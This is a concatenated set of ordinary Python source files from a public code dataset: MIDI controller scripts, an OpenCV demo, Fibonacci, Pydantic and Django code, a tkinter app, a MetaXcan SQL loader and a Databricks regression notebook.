else:\n handler.set_no_track_action(self._global_action)\n\n return\n\n def _global_action(self, value, button):\n if value == 0:\n return\n\n def empty_action(self, value, button):\n if value == 0:\n return\n if self.canonical_parent.is_shift_down():\n self.song().create_audio_track(-1)\n else:\n if self.canonical_parent.is_select_down():\n self.song().create_audio_track(-1)\n else:\n self.song().create_midi_track(-1)\n\n def handle_shift(self, shift_value):\n if shift_value:\n for handler in self.__track_handlers:\n handler.set_no_track_action(self.handle_shift_button)\n\n else:\n self._assign_tracks()\n\n def handle_shift_button(self, value, button):\n if value != 0:\n self.canonical_parent.handle_edit_action(button.get_position())\n\n def enter(self):\n self._active = True\n self._assign_tracks()\n self.refresh()\n\n def exit(self):\n self._active = False\n self._deassign()\n\n\nclass LevelTracks(CompoundComponent):\n __track = None\n __color = 0\n __index = 0\n __last_meter_val = 0\n __last_bar = (0, 0, 0, 0)\n\n def __init__(self, index, *a, **k):\n super(LevelTracks, self).__init__(*a, **k)\n self.__index = index\n self.__buttons = [None, None, None, None]\n return\n\n def set_button(self, button, index):\n self.__buttons[index] = button\n\n def set_track(self, track):\n self.__track = track\n if track:\n self.__color = toHSB(track.color)[1]\n self._output_meter_changed.subject = track\n else:\n self._output_meter_changed.subject = None\n return\n\n def to_bar(self, value):\n return (\n value >= 3 and self.__color + 2 or value == 2 and self.__color or 0,\n value >= 5 and self.__color + 2 or value == 4 and self.__color or 0,\n value >= 7 and self.__color + 2 or value == 8 and self.__color or 0,\n value >= 9 and self.__color + 2 or value == 9 and self.__color or 0)\n\n @subject_slot('output_meter_level')\n def _output_meter_changed(self):\n if self.__track:\n val = int(10 * self.__track.output_meter_level)\n if val != self.__last_meter_val:\n self.__last_bar = self.to_bar(val)\n self.send_color()\n\n def send_color(self):\n if self.__track:\n self.__buttons[0].send_color_direct(self.__last_bar[0])\n self.__buttons[1].send_color_direct(self.__last_bar[1])\n self.__buttons[2].send_color_direct(self.__last_bar[2])\n self.__buttons[3].send_color_direct(self.__last_bar[3])\n else:\n for button in self.__buttons:\n button.send_color_direct(0)\n\n def unbind(self):\n self.__track = None\n self._output_meter_changed.subject = None\n return\n\n\nclass LevelIndicatorMode(MaschineMode):\n __track_handlers = None\n\n def __init__(self, *a, **k):\n super(LevelIndicatorMode, self).__init__(*a, **k)\n self.__track_handlers = [ LevelTracks(idx) for idx in range(4) ]\n\n def init_elements(self):\n for button, (column, row) in self.canonical_parent._bmatrix.iterbuttons():\n if button:\n self.__track_handlers[column].set_button(button, 3 - row)\n\n def gettrack(self, index, off):\n tracks = self.song().visible_tracks\n if index + off < len(tracks):\n return tracks[index + off]\n return\n\n def refresh(self):\n if self._active:\n for handler in self.__track_handlers:\n handler.send_color()\n\n def _assign_tracks(self):\n self._tracks_change.subject = self.song()\n self._visible_changed.subject = self.song()\n trackoff = self.canonical_parent._session.track_offset()\n for i in range(4):\n handler = self.__track_handlers[i]\n handler.unbind()\n track = self.gettrack(i, trackoff)\n handler.set_track(track)\n\n def _deassign(self):\n self._tracks_change.subject = None\n self._visible_changed.subject = None\n for handler in self.__track_handlers:\n handler.unbind()\n\n return\n\n @subject_slot('tracks')\n def _tracks_change(self):\n self._assign_tracks()\n self.refresh()\n\n @subject_slot('visible_tracks')\n def _visible_changed(self):\n self._assign_tracks()\n self.refresh()\n\n def enter(self):\n self._active = True\n self._assign_tracks()\n self.refresh()\n\n def exit(self):\n self._active = False\n self._deassign()\n","repo_name":"alessandroseno/AbletonLive10_MIDIRemoteScripts","sub_path":"Maschine_Mk3_Legacy/TrackMode.py","file_name":"TrackMode.py","file_ext":"py","file_size_in_byte":9935,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"34869460146","text":"import cv2 as cv\nimport numpy as np\n\n\nimg = cv.imread('./photos/vscode.png')\ncv.imshow(\"VS Code\", img)\nblank = np.zeros(img.shape, np.uint8)\n#Split to color channels\nb,g,r = cv.split(img)\ncv.imshow(\"Blue\", b)\ncv.imshow(\"Green\", g)\ncv.imshow(\"Red\", r)\n\nblue = cv.merge((b,blank,blank))\ngreen = cv.merge((blank,g,blank))\nred = cv.merge((blank,blank,r))\ncv.imshow(\"Blue\", blue)\ncv.imshow(\"Green\", green)\ncv.imshow(\"Red\", red)\n\nprint(b.shape)\nprint(g.shape)\nprint(r.shape)\n\n#Merge color channels\nmerged = cv.merge((b,g,r))\ncv.imshow(\"Merged\", merged)\n\n\n\ncv.waitKey(0)","repo_name":"hasanaliozkan-dev/opencv_tutorial","sub_path":"splitmerge.py","file_name":"splitmerge.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23730183602","text":"import sys\n\n\ndef fibonacci_recursivo(n):\n if n==0 or n==1:\n return 1\n return fibonacci_recursivo(n-1)+fibonacci_recursivo(n-2)\n\ndef fibonacci_dinamico(n,memo={}):\n if n==0 or n==1:\n return 1\n try:\n return memo[n] #Existe el numero de fibonacci de n?\n except KeyError:\n resultado= fibonacci_dinamico(n-1,memo)+fibonacci_dinamico(n-2,memo)\n memo[n]=resultado #Lo guardamos con el indice=lugar de fibonacci\n return resultado\n\nif __name__ == \"__main__\":\n sys.setrecursionlimit(10002)\n n=int(input('Escoge un numero: '))\n resultado=fibonacci_dinamico(n)\n print(resultado)","repo_name":"BralexMtz/Curso-Estadistica-Computacional-Python","sub_path":"programacion_dinamica.py","file_name":"programacion_dinamica.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72996687874","text":"from pydantic import BaseModel, EmailStr, conint\nfrom datetime import datetime\nfrom typing import Optional\n\n# by having these schemas you are regulating what can be changed or called when \n# using a get, post, delete, or update. by having these specific classes for each instance \n# you can have specific parameters in plavce. \n# for example, if I want you to only be able to update the title \n# I can only have the title available under the UpdatePost class\n# Or if I want to make something manditory I will have it under that class\n\nclass CourseBase(BaseModel):\n title: str\n requirements: str\n created_at: datetime\n\nclass Course(CourseBase):\n id: int\n owner_id: int\n \n\n class Config:\n orm_mode = True\n\n\nclass UniOut(BaseModel):\n id: int\n name: str\n img: str\n nickname: str\n color: str\n text_color: str\n\n class Config:\n orm_mode = True\n\nclass CourseOut(CourseBase):\n id: int\n link: str\n owner_id: int\n owner: UniOut\n \n\n class Config:\n orm_mode = True\n\n\n\nclass CreateCourse(BaseModel):\n title: str\n requirements: str\n link : str\n\nclass UpdateCourse(BaseModel):\n title: str\n requirements: str\n link: str\n\n# can also make use of inheritance \n# a class that inherites from another has all of its schemas \n\nclass CreateCourses(BaseModel):\n Course: CreateCourse\n\n\n\n\n\nclass UniCreate(BaseModel):\n name: str\n img: str\n color: str\n text_color: str\n nickname: str\n password: str\n\n\n\n\nclass UniLogin(BaseModel):\n name: str\n password: str\n\nclass UpdateUni(BaseModel):\n name: str\n img: str\n color: str\n text_color: str\n nickname: str\nclass Token(BaseModel):\n access_token: str\n token_type: str\n\nclass TokenData(BaseModel):\n id: Optional[str] = None\n\n\n\n\n","repo_name":"JackBCJones/FMD_API","sub_path":"app/schemas.py","file_name":"schemas.py","file_ext":"py","file_size_in_byte":1790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35887705787","text":"from django.shortcuts import render\n\nfrom positions.models import Account, Position\nfrom . import analysis_utils as au\n\n\ndef index(request):\n \"\"\"Primary view for portfolio analysis\"\"\"\n\n positions_data = au.get_position_data(Position.objects.all())\n accounts = Account.objects.all()\n total_cash = sum((acct.cash_balance for acct in accounts))\n\n concentration_bar_chart = au.get_concentration_bar_chart(positions_data)\n concentration_area_chart = au.get_concentration_area_chart(positions_data)\n\n context = {\n \"positions\": positions_data.to_html(index=False, float_format=lambda x: '%10.2f' % x),\n \"accounts\": [acct.name for acct in accounts],\n \"cash_balances\": {acct: acct.cash_balance for acct in accounts},\n \"total_cash\": \"{:,.2f}\".format(total_cash),\n \"total_value\": \"{:,.2f}\".format(total_cash + positions_data[\"Market Value ($)\"].sum()),\n \"num_positions\": positions_data.shape[0],\n \"concentration_bar_chart\": concentration_bar_chart,\n \"concentration_area_chart\": concentration_area_chart,\n }\n\n return render(request, \"analysis/index.html\", context)\n","repo_name":"rdcolema/snapshot-finance","sub_path":"analysis/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1136,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"61"} +{"seq_id":"20225342246","text":"def solution(matrix_sizes):\n n = len(matrix_sizes)\n INF = int(1e9)\n dp = [[INF] * n for _ in range(n)]\n\n for i in range(n):\n for j in range(n):\n if i == j:\n dp[i][j] = 0\n\n for step in range(1, n):\n for start in range(n):\n end = start + step\n if end >= n:\n break\n for sep in range(start, end):\n dp[start][end] = min(dp[start][end],\n dp[start][sep] + dp[sep + 1][end]\n + matrix_sizes[start][0] * matrix_sizes[sep][1] * matrix_sizes[end][1])\n\n return dp[0][n-1]","repo_name":"ko509/Weekly-AlgoStudy","sub_path":"1차/3주차/우민지/[Pro] 최적의 행렬곱셈.py","file_name":"[Pro] 최적의 행렬곱셈.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"71325235396","text":"import socket\nimport signal\nimport threading\nimport requests\nimport sys\nimport struct\nfrom time import sleep\n\ntcp_sock = None\n\n\ndef exterminate(arg1, arg2):\n tcp_sock.send(requests.exit_msg())\n sys.exit(0)\n\n\ndef listen(sock):\n print(\"listen...\")\n while True:\n try:\n sleep(2)\n data = sock.recv(1024)\n print(data.decode(\"utf-8\"))\n except OSError:\n return\n\n\ndef show_help():\n print('''\n!help - show help\n!list - get stations\n!station - connect to station\n!stop - disconnect from station\n''')\n\n\nif __name__ == '__main__':\n if len(sys.argv[1:]) != 3:\n print(\"usage : %s \")\n sys.exit(1)\n port = int(sys.argv[3])\n server_port = int(sys.argv[2])\n server_ip = sys.argv[1]\n udp_thread = None\n udp_sock = None\n\n signal.signal(signal.SIGINT, exterminate)\n\n tcp_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n tcp_sock.connect((server_ip, server_port))\n show_help()\n while True:\n cmd = input()\n if cmd == '!help':\n show_help()\n elif cmd == '!list':\n tcp_sock.send(requests.list_msg())\n stations = tcp_sock.recv(1024).decode(\"utf-8\")\n print(stations)\n elif cmd.split()[0] == '!station':\n tcp_sock.send(requests.station_msg(cmd.split()[1]))\n while True:\n song, ret = requests.parse_song(tcp_sock.recv(1024))\n if ret is None:\n break\n tcp_sock.send(requests.list_msg())\n print(song)\n addr = song\n print(addr)\n udp_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)\n udp_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n udp_sock.bind(('', server_port))\n addr_bytes = struct.pack(\"=4sl\", socket.inet_aton(addr), socket.INADDR_ANY)\n udp_sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, addr_bytes)\n udp_thread = threading.Thread(target=listen, args=(udp_sock,))\n udp_thread.daemon = True\n udp_thread.start()\n elif cmd == '!stop':\n udp_sock.close()\n else:\n show_help()\n","repo_name":"artfly/Networks","sub_path":"radio/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":2294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38079071375","text":"with open('Chapter 9\\\\input.txt', 'r') as f:\n # ✅ get list of all lines\n lines = f.read().splitlines()\n\nsum = 0\nfor line in lines:\n left, right = line.split(',')\n l1 = list(range(int(left.split('-')[0]), int(left.split('-')[1])+1))\n l2 = list(range(int(right.split('-')[0]), int(right.split('-')[1])+1))\n if(any(x in l1 for x in l2)) or (any(x in l2 for x in l1)):\n sum += 1\n\nprint(sum)","repo_name":"bartoszc/Python-Crash-Course-Solutions","sub_path":"Chapter 9/day_4.py","file_name":"day_4.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23506311101","text":"import sys\n\n\"\"\"\ndef stupid_is_prime(n):\n for i in range(2, n-1):\n if n % i == 0:\n return i, False\n return None, True\n\ndef all_bases_not_prime(n):\n return not any([stupid_is_prime(int(str(n), base))[1] for base in range(2, 10+1)])\n\"\"\"\n\ndef read_case(line):\n line = line.strip().split()\n return int(line[0]), int(line[1])\n\nfactor = {2: 3, 3: 2, 4: 5, 5: 2, 6: 7, 7: 2, 8: 3, 9: 2, 10: 11}\n\n\ndef divisible_by_base_factor(n):\n for base in range(2, 10+1):\n number_in_base = int(str(n), base)\n if number_in_base % factor[base] != 0:\n return False\n return True\n\n\ndef make_solution(case):\n length, coun = case\n\n solution = []\n i = 0\n for number in range(2**(length-1)+1, 2**length, 2):\n number = bin(number)[2:]\n\n if divisible_by_base_factor(number):\n solution.append(str(number)+\" \" + \" \".join([str(factor[b]) for b in range(2, 10+1)]))\n i += 1\n\n if i>=coun:\n break\n\n return \"\\n\".join(solution)\n\n\nif __name__ == \"__main__\":\n #f = sys.stdin\n f = open(\"samples.text\")\n count = int(f.readline())\n for c in range(count):\n case = read_case(f.readline())\n solution = make_solution(case)\n print(\"Case #{}:\\n{}\".format(c+1, solution))","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_179/2091.py","file_name":"2091.py","file_ext":"py","file_size_in_byte":1285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29836190453","text":"from react_integration.settings import TEMPLATES\nfrom django.http import HttpResponse\nfrom django.shortcuts import render\nimport joblib\nfrom django.template.response import TemplateResponse\n\ndef index(request):\n print(request.GET)\n if request.method == 'GET' and 'input-form' in request.GET: \n P = joblib.load('finalized_model3.sav')\n lis1=[]\n lis1.append(request.GET['input-form'])\n answer1=P.predict(lis1)\n print(answer1)\n return render(request,\"index.html\",{'text1':answer1}) \n print(\"the request iss in method1\")\n else:\n print(\"request not in method\")\n sainterface=TemplateResponse(request,'index.html',{})\n return sainterface\n #return render(request,\"/sa_interface/build`/index.html\")\n # answer=1\n # if request.method == 'GET' and 'q' in request.GET:\n # q=request.GET['q']\n # if q:\n # print(\"There is some value\")\n # return render(request,\"index.html\",{'text':answer})\n # else:\n # print(\"The value is empty \")\n # return render(request,\"index.html\")\n # P = joblib.load('finalized_model3.sav')\n # review=\"the product is good also\"\n # lis=[]\n # lis.append(\"this product is very good\")\n # # lis.append(request.GET)\n # answer = P.predict(lis)\n # print(answer)\n # print(\"hello\")\n # lis1=[]\n \n\n \n\n \n \n # print(request.GET)\n # data=(request.GET)\n # print(\"The data is\")\n # forward=0\n # print(forward)\n # # print(data)\n # # move=(request.GET['forward'])\n # # print(move)\n # return render(request,\"index.html\",{'text':answer})\n\ndef ok(request):\n P = joblib.load('finalized_model3.sav')\n lis1=[]\n lis1.append(request.GET['comment'])\n answer1=P.predict(lis1)\n print(answer1)\n\n return render(request,\"index.html\",{'text':answer1})\n","repo_name":"ashishadhikary/sentimentUI","sub_path":"react_integration/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39082699553","text":"#Histogram with a best fit line\r\n\r\nimport numpy as np\r\nimport matplotlib.mlab as mlab #For the best fit line\r\nimport matplotlib.pyplot as plt\r\n \r\n \r\n# Random example data\r\nmu = 100 # mean of distribution\r\nsigma = 15 # standard deviation of distribution\r\nx = mu + sigma * np.random.randn(100000) #Normalised data\r\n \r\nnum_bins = 20\r\n# the histogram of the data\r\nn, bins, patches = plt.hist(x, num_bins, normed=1, facecolor='blue', alpha=0.5)\r\n \r\n# add a 'best fit' line\r\ny = mlab.normpdf(bins, mu, sigma)\r\nplt.plot(bins, y, 'r--')\r\n\r\n#Histogram details\r\nplt.xlabel('Data Point')\r\nplt.ylabel('Probability')\r\nplt.title(r'Sample Histogram')\r\n \r\n# Tweak spacing to prevent clipping of ylabel\r\nplt.subplots_adjust(left=0.15)\r\nplt.show()\r\n","repo_name":"srinidhi151/Book","sub_path":"Part 4/Chapter 18/Distribution_charts_2(Listing_8).py","file_name":"Distribution_charts_2(Listing_8).py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"2580026323","text":"#! /usr/bin/env python\n\nimport os\nimport psycopg2\nimport scipy.stats as stats\nimport logging\nimport Logging\n\nclass CSVTF1(object):\n GENE=0\n GENE_NAME=1\n ZSCORE=2\n PVALUE=3\n PRED_PERF_R2=4\n VAR_G=5\n N=6\n COVARIANCE_N=7\n MODEL_N=8\n\n header=\"gene,gene_name,zscore,pvalue,pred_perf_R2,VAR_g,n,covariance_n,model_n\"\n\nclass CSVTF2(object):\n GENE=0\n GENE_NAME=1\n ZSCORE=2\n VAR_G=3\n N=4\n COVARIANCE_N=5\n MODEL_N=6\n PRED_PERF_R2=7\n\n header=\"gene,gene_name,zscore,VAR_g,n,covariance_n,model_n,pred_perf_R2\"\n\ndef check_table(conn, table_name):\n if not str.isalnum(table_name):\n raise RuntimeError(\"Won't accept %s\" %(table_name,))\n cursor = conn.cursor()\n query = 'CREATE TABLE IF NOT EXISTS metaxcanresults (' \\\n ' \"gene\" varchar,' \\\n ' \"gene_name\" varchar,' \\\n ' \"zscore\" real,' \\\n ' \"n\" integer,' \\\n ' \"model_n\" integer,' \\\n ' \"pred_perf_r2\" real,' \\\n ' \"pval\" double precision,' \\\n ' \"tissue\" varchar,' \\\n ' \"pheno\" varchar' \\\n ' );'\n\n cursor.execute(query)\n conn.commit()\n\n\ndef process_results_file(path, conn, table_name, tissue_tag=None):\n if not str.isalnum(table_name):\n raise RuntimeError(\"Cannot accept %s\" % (table_name, ))\n\n content = os.path.basename(os.path.normpath(path))\n\n tissue = content\n if \"_elasticNet\" in tissue: tissue =tissue.split(\"_elasticNet\")[0]\n if \"-unscaled\" in tissue: tissue = tissue.split(\"-unscaled\")[0]\n if \".csv\" in tissue: tissue = tissue.split(\".csv\")[0]\n\n if \"_DGN\" in tissue:\n pheno = tissue.split(\"_DGN\")[0]\n tissue = \"DGN_WB\"\n elif \"DGN\" in tissue:\n pheno = tissue.split(\"DGN\")[0]\n tissue = \"DGN_WB\"\n elif \"_TW_\" in tissue:\n pheno = tissue.split(\"_TW_\")[0]\n tissue = \"TW_\"+tissue.split(\"_TW_\")[1]\n elif \"TW_\" in tissue:\n pheno = tissue.split(\"TW_\")[0]\n tissue = \"TW_\"+tissue.split(\"TW_\")[1]\n elif \"_CrossTissue_\" in tissue:\n pheno = tissue.split(\"_CrossTissue_\")[0]\n tissue = \"CrossTissue\"\n elif \"CrossTissue_\" in tissue:\n pheno = tissue.split(\"CrossTissue_\")[0]\n tissue = \"CrossTissue\"\n else:\n logging.info(\"Bad name: %s\", content)\n return\n\n if tissue_tag:\n tissue = tissue + tissue_tag\n\n logging.info(\"opening %s\",path)\n cursor = conn.cursor()\n data = []\n with open(path) as file:\n for i, line in enumerate(file):\n if i==0:\n header = line.strip()\n if header == CSVTF1.header:\n logging.info(\"selected new format\")\n RTF=CSVTF1\n elif header == CSVTF2.header:\n logging.info(\"selected old format\")\n RTF=CSVTF2\n else:\n raise RuntimeError(\"Invalid header\")\n continue\n # if i % 1000 == 0:\n # logging.info(\"Rolling!\")\n\n\n comps = line.strip().split(\",\")\n if comps[RTF.ZSCORE] == \"NA\": continue\n if \"inf\" in comps[RTF.ZSCORE]: continue\n\n gene = comps[RTF.GENE]\n gene_name = comps[RTF.GENE_NAME]\n zscore = float(comps[RTF.ZSCORE])\n n = int(comps[RTF.N])\n model_n = int(comps[RTF.MODEL_N])\n pred_perf_r2 = float(comps[RTF.PRED_PERF_R2])\n if RTF == CSVTF1:\n pval = float(comps[RTF.PVALUE])\n else:\n pval = stats.norm.sf(abs(zscore)) * 2\n\n data.append((gene, gene_name, zscore, n, model_n, pred_perf_r2, pval, tissue, pheno, ))\n # cursor.execute(\n # \"insert into \" + table_name + \" (gene, gene_name, zscore, n, model_n, pred_perf_r2, pval, pheno, tissue) values (%s,%s,%s,%s,%s,%s,%s,%s,%s)\",\n # (gene, gene_name, zscore, n, model_n, pred_perf_r2, pval, pheno, tissue,))\n logging.info(\"Making query\")\n dataText = ','.join(cursor.mogrify('(%s,%s,%s,%s,%s,%s,%s,%s,%s)', row) for row in data)\n cursor.execute('insert into ' + table_name + ' values ' + dataText)\n conn.commit()\n\nclass LoadIntoSQL(object):\n def __init__(self, args):\n self.args = args\n\n def run(self):\n logging.info(\"Connecting...\")\n conn = self.build_connection()\n\n logging.info(\"Checking table...\")\n check_table(conn,self.args.table_name)\n\n logging.info(\"processing\")\n contents = os.listdir(self.args.results_folder)\n\n for content in contents:\n skip = False\n for e in self.args.exclude_patterns:\n if e in content:\n skip = True\n break\n if skip:\n logging.info(\"skipping %s\", content)\n continue\n\n logging.info(\"processing %s\", content)\n path = os.path.join(self.args.results_folder, content)\n process_results_file(path, conn, self.args.table_name, self.args.tissue_tag)\n\n def build_connection(self):\n conn = psycopg2.connect(host=self.args.host, database=self.args.db_name, user=self.args.user_name, password=self.args.user_password)\n return conn\n\nif __name__== \"__main__\":\n import argparse\n\n\n parser = argparse.ArgumentParser(description='Load results into SQL')\n\n parser.add_argument(\"--host\",\n help=\"db host\",\n default=\"127.0.0.1\")\n\n parser.add_argument(\"--db_name\",\n help=\"database name\",\n default=\"kk2\")\n\n parser.add_argument(\"--user_name\",\n help=\"database user name\")\n\n parser.add_argument(\"--user_password\",\n help=\"database user name\")\n\n parser.add_argument(\"--table_name\",\n help=\"alphanumeric table name\",\n default=\"metaxcanresults\")\n\n parser.add_argument('--exclude_patterns', type=str, nargs='+',\n help='Strings to filter out results files. (not regexp at the moment)',\n default=[\"TS_\", \"Organ_\"])\n\n parser.add_argument(\"--results_folder\",\n help=\"path to folder with metaxcan results\",\n default=\"results\")\n\n parser.add_argument(\"--tissue_tag\",\n help=\"String addition to tissue name\",\n default=None)\n\n parser.add_argument(\"--verbosity\",\n help=\"Log verbosity level. 1 is everything being logged. 10 is only high level messages, above 10 will hardly log anything\",\n default = \"10\")\n\n args = parser.parse_args()\n\n Logging.configureLogging(int(args.verbosity))\n\n work = LoadIntoSQL(args)\n work.run()","repo_name":"hakyimlab/MetaXcan","sub_path":"software/metax/deprecated/SQLUtilities.py","file_name":"SQLUtilities.py","file_ext":"py","file_size_in_byte":6723,"program_lang":"python","lang":"en","doc_type":"code","stars":117,"dataset":"github-code","pt":"61"} +{"seq_id":"40649220985","text":"import tkinter as tk\nfrom tkinter import *\nfrom tkinter import Menu\nfrom tkinter import messagebox\nfrom tkinter import ttk\nimport os\nimport matplotlib.pyplot as plt\nfrom tkinter import filedialog as fd\nimport pandas as pd\nfrom try2 import graphs\n\nimport numpy as np\n\nroot = tk.Tk()\nroot.title(\"Ocean-Book1\")\n\nroot.geometry(\"900x700\")\n\nsidepanel = Frame(root, width=70, bg='#3385ff', relief=SUNKEN)\nsidepanel.pack_propagate(0)\nsidepanel.pack(side=LEFT, fill='y')\n\nmy_file_path = []\n\n\ndef selectFile():\n importf = fd.askopenfilename(initialdir=\"/\", title=\"Select A File\",\n filetype=((\"xlsx files\", \"*.xlsx\"), (\"All Files\", \"*.*\")))\n print(importf, 'importf')\n my_file_path.append(importf)\n print(my_file_path, 'my_file_path')\n myfile()\n\n\nfilepanel = Frame(root, height=450, width=1150)\nfilepanel.pack(side=BOTTOM, padx=70, anchor='sw', fill='x', expand=True)\nfilepanel.pack_propagate(0)\n\ndisplay_file = Text(filepanel)\ndisplay_file.config(state='disabled')\ndisplay_file.pack()\n\n\ndef myfile():\n try:\n if my_file_path[-4:] == \".csv\":\n df = pd.read_csv(my_file_path[-1])\n\n else:\n df = pd.read_excel(my_file_path[-1])\n\n except ValueError:\n tk.messagebox.showerror(\"Information\", \"The file you have chosen is invalid\")\n return None\n except FileNotFoundError:\n tk.messagebox.showerror(\"Information\", f\"No such file as {my_file_path}\")\n return None\n # df = pd.read_excel(my_file_path[-1])\n print(df, 'df')\n display_file.config(state='normal')\n display_file.insert('1.0', df)\n display_file.config(state='disabled')\n data_info(df)\n\n\nsheetpanel = Frame(root, width=100, bg='yellow', height=40)\nsheetpanel.pack_propagate(0)\nsheetpanel.pack(side=TOP, fill='x', anchor='ne', padx=70)\n\nAddIcon = PhotoImage(file=\"C:/Users/acesi/PycharmProjects/Ocean25/new_file.png\")\n\ninputBtn = Button(sidepanel, fg='#732626', bg='#3385ff', text=\"import\", image=AddIcon, command=selectFile)\ninputBtn.pack(pady=50)\n\n\nsheetbtn = Button(sheetpanel, fg='red', bg='black', text='addSheet', command=charts())\nsheetbtn.pack_propagate(0)\nsheetbtn.place(x=20, y=5)\nsheetbtn.pack(padx=20, side=LEFT)\n\ndef charts():\n sidepanel.destroy()\n inputBtn.destroy()\n sheetpanel.destroy()\n sheetbtn.destroy()\n filepanel.destroy()\n display_file.destroy()\n df = pd.read_excel(my_file_path[-1])\n graphs(root, df)\n pass\ndef data_info(df):\n my_cols = df.columns\n my_rows = df.values\n print(df.info())\n # print(my_cols,'\\n next')\n # print(my_rows)\n\n\n\n\n\nroot.mainloop()\n","repo_name":"Mazhar-Aces/my_practice","sub_path":"try.py","file_name":"try.py","file_ext":"py","file_size_in_byte":2593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5899141938","text":"from keyboards.default.cats import all_cats\nfrom loader import dp, db \nfrom aiogram import types\nfrom states.praduct import Shop\nfrom aiogram.dispatcher import FSMContext\n\n\n@dp.callback_query_handler(state=Shop.amount)\nasync def get_amount(call: types.CallbackQuery, state: FSMContext):\n amuount=call.data\n data = await state.get_data()\n title = data.get('title')\n price = data.get('price')\n user_id = data.get('user_id')\n await call.answer(f\"{amuount} ta {title} Savatga qoshildi\", show_alert=True) \n await call.message.answer(\"Asosiy sahifa\",parse_mode=\"html\",reply_markup=all_cats)\n db.add_product_cart(tg_id=user_id, title=title, price=price, amuount=amuount)\n await call.message.delete()\n await Shop.category.set()","repo_name":"matchanov07/texnobozorbot","sub_path":"handlers/users/amount.py","file_name":"amount.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"71557183553","text":"# Databricks notebook source\n# MAGIC %md\n# MAGIC # Regression: Predicting Rental Price\n# MAGIC \n# MAGIC In this notebook, we will use the dataset we cleansed in the previous lab to predict Airbnb rental prices in San Francisco.\n# MAGIC \n# MAGIC ## ![Spark Logo Tiny](https://files.training.databricks.com/images/105/logo_spark_tiny.png) In this lesson you:
\n# MAGIC - Use the SparkML API to build a linear regression model\n# MAGIC - Identify the differences between estimators and transformers\n\n# COMMAND ----------\n\nimport os\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ### Setting the default database and user name \n# MAGIC ##### Substitute \"renato\" by your name in the `username` variable.\n\n# COMMAND ----------\n\n## Put your name here\nusername = \"renato\"\n\ndbutils.widgets.text(\"username\", username)\nspark.sql(f\"CREATE DATABASE IF NOT EXISTS dsacademy_embedded_wave3_{username}\")\nspark.sql(f\"USE dsacademy_embedded_wave3_{username}\")\nspark.conf.set(\"spark.sql.shuffle.partitions\", 40)\n\nspark.sql(\"SET spark.databricks.delta.formatCheck.enabled = false\")\nspark.sql(\"SET spark.databricks.delta.properties.defaults.autoOptimize.optimizeWrite = true\")\n\n# COMMAND ----------\n\ndeltaPath = os.path.join(\"/\", \"tmp\", username) #If we were writing to the root folder and not to the DBFS\nif not os.path.exists(deltaPath):\n os.mkdir(deltaPath)\n \nprint(deltaPath)\n\nairbnbDF = spark.read.format(\"delta\").load(deltaPath)\n\n# COMMAND ----------\n\nairbnbDF.limit(10).display()\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ## Train/Test Split\n# MAGIC \n# MAGIC ![](https://files.training.databricks.com/images/301/TrainTestSplit.png)\n# MAGIC \n# MAGIC **Question**: Why is it necessary to set a seed? What happens if I change my cluster configuration?\n\n# COMMAND ----------\n\ntrainDF, testDF = airbnbDF.randomSplit([.8, .2], seed=42)\nprint(trainDF.cache().count())\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Let's change the # of partitions (to simulate a different cluster configuration), and see if we get the same number of data points in our training set.\n\n# COMMAND ----------\n\ntrainRepartitionDF, testRepartitionDF = (airbnbDF\n .repartition(24)\n .randomSplit([.8, .2], seed=42))\n\nprint(trainRepartitionDF.count())\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ## Linear Regression\n# MAGIC \n# MAGIC We are going to build a very simple model predicting `price` just given the number of `bedrooms`.\n# MAGIC \n# MAGIC **Question**: What are some assumptions of the linear regression model?\n\n# COMMAND ----------\n\ndisplay(trainDF.select(\"price\", \"bedrooms\"))\n\n# COMMAND ----------\n\ndisplay(trainDF.select(\"price\", \"bedrooms\").summary())\n\n# COMMAND ----------\n\ndisplay(trainDF)\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC There do appear some outliers in our dataset for the price ($10,000 a night??). Just keep this in mind when we are building our models :).\n# MAGIC \n# MAGIC We will use `LinearRegression` to build our first model \n# MAGIC [Python](https://spark.apache.org/docs/latest/api/python/reference/api/pyspark.ml.regression.LinearRegression.html)\n# MAGIC \n# MAGIC The cell below will 